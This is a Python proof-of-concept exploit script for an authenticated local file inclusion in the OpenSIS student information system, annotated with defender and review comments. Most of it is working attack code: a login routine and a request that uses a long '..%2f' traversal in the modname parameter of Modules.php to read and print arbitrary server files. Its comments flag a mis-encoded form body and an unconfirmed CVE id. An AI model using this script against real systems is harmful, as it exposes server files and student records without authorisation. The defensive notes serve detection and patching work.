CVE-2020-1082-opensis-lfi.py
import requests
import argparse
from bs4 import BeautifulSoup
# Headers attached to every request this script sends.
# Content-Type matches the hand-built "k=v&k=v" bodies used in login() and
# extract_file(). The User-Agent is a fixed string imitating Firefox 78 on
# Windows 10; it is a constant in this file and trivially changed, so it is
# a weak log indicator on its own.
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
}
def extract_file(session, args):
    """Send the file-inclusion request and print the returned panel text.

    Issues one POST to ``Modules.php`` on ``args.host`` using the already
    authenticated ``session``. The ``modname`` query parameter starts with a
    legitimate module path and is followed by a run of ``..%2f`` sequences
    and ``args.file``. The response HTML is parsed and the text of the
    element with id ``update_panel`` is printed.

    Defender notes:
      * The traversal sits in the URL query string, so it is recorded in
        ordinary web-server access logs. Requests to ``Modules.php`` whose
        ``modname`` contains ``..`` / ``%2f`` sequences are the artefact to
        alert on.
      * The durable fix is server-side: resolve ``modname`` against an
        allowlist of module files and reject anything that leaves the
        module directory, in addition to applying the vendor's patched
        release.
      * NOTE(review): the CVE id used by this script comes from its file
        name and description only; confirm it against the vendor advisory
        before using it for tracking.
    """
    print(f"[+] Extracting {args.file}...")

    # The URL is always built with the http:// scheme, so args.host is
    # expected without a scheme.
    target_url = f"http://{args.host}/Modules.php?modname=grades%2fReportCards.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..{args.file}&modfunc=&search_modfunc=list&next_modname=students/Student.php"

    # Empty student-search form. NOTE(review): as rendered on this page the
    # literal contains mis-encoded characters (the "§" and "Ð" bytes), so it
    # is not a faithful copy of the original request body.
    form_body = "last=&first=&stuid=&altid=&addr=&grade=§ion=&sql_save_session=true&mp_comment=&middle_name=&common_name=&GENDER=ÐNICITY=&LANGUAGE=&email=&phone=&username=&day_from_birthdate=&month_from_birthdate=&day_to_birthdate=&month_to_birthdate=&day_dob_birthdate=&month_dob_birthdate=&year_dob_birthdate=&day_from_est=&month_from_est=&year_from_est=&day_to_est=&month_to_est=&year_to_est=&day_from_st=&month_from_st=&year_from_st=&day_to_st=&month_to_st=&year_to_st=&day_from_en=&month_from_en=&year_from_en=&day_to_en=&month_to_en=&year_to_en=&home_address_1=&home_address_2=&home_city=&home_state=&home_zip=&home_busno=&mail_address_1=&mail_address_2=&mail_city=&mail_state=&mail_zip=&primary_realtionship=&primary_first_name=&primary_second_name=&primary_home_phone=&primary_work_phone=&primary_mobile_phone=&primary_email=&secondary_realtionship=&secondary_first_name=&secondary_second_name=&secondary_home_phone=&secondary_work_phone=&secondary_mobile_phone=&secondary_email=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&_search_all_schools=Y"

    # verify=False only matters for https:// URLs; with the http:// URL built
    # above there is no certificate to validate. Redirects are not followed,
    # so a redirect response is parsed as-is.
    resp = session.post(
        target_url,
        data=form_body,
        headers=headers,
        allow_redirects=False,
        verify=False,
    )

    page = BeautifulSoup(resp.text, "html.parser")
    # NOTE(review): find() returns None when the page has no element with
    # this id (for example on an unauthenticated or patched response), and
    # the get_text() call below then raises AttributeError.
    panel = page.find(id="update_panel")
    print(panel.get_text())
def login(session, args):
    """Authenticate ``session`` against the application's login form.

    Posts ``USERNAME``/``PASSWORD`` (plus an empty ``log`` field) to
    ``index.php`` on ``args.host`` and returns the same session object, which
    then carries whatever cookies the server set.

    Review notes:
      * The response is discarded, so a rejected login is not detected here.
      * The URL is built with http://, so the credentials travel in
        cleartext; verify=False has no effect on such a URL.
      * Username and password are interpolated into the body without
        URL-encoding, so values containing ``&`` or ``=`` are not sent as
        typed.
      * This request path requires valid credentials, so the issue is
        reachable only by an authenticated account. Account hygiene and
        login monitoring are therefore relevant compensating controls.
    """
    print("[+] Logging in...")
    endpoint = f"http://{args.host}/index.php"
    credentials_body = f"USERNAME={args.username}&PASSWORD={args.password}&log="
    session.post(endpoint, data=credentials_body, headers=headers, verify=False)
    return session
def main():
    """Parse the command line, log in, then request the named file.

    All four options are needed. If any is missing or empty the help text is
    printed and the process exits with status 0.

    Review notes:
      * The ``--host`` help shows a scheme-prefixed example, while login()
        and extract_file() prepend ``http://`` themselves; the two disagree.
      * Exiting with status 0 on a usage error hides the failure from
        calling scripts.
      * ``--password`` is taken from argv, where it is visible in the
        process list and shell history of the machine running the script.
    """
    parser = argparse.ArgumentParser(description="CVE-2020-1082 OpenSIS LFI PoC.")
    option_help = (
        ("--host", "The host to target. Format example: https://host:port"),
        ("--username", "The username to login with"),
        ("--password", "The password to login with"),
        ("--file", "The file to extract"),
    )
    for flag, text in option_help:
        parser.add_argument(flag, help=text)
    args = parser.parse_args()

    supplied = (args.host, args.username, args.password, args.file)
    if not all(supplied):
        parser.print_help()
        exit(0)

    # One session is used for both requests so the login cookies are reused.
    session = login(requests.Session(), args)
    extract_file(session, args)


if __name__ == "__main__":
    main()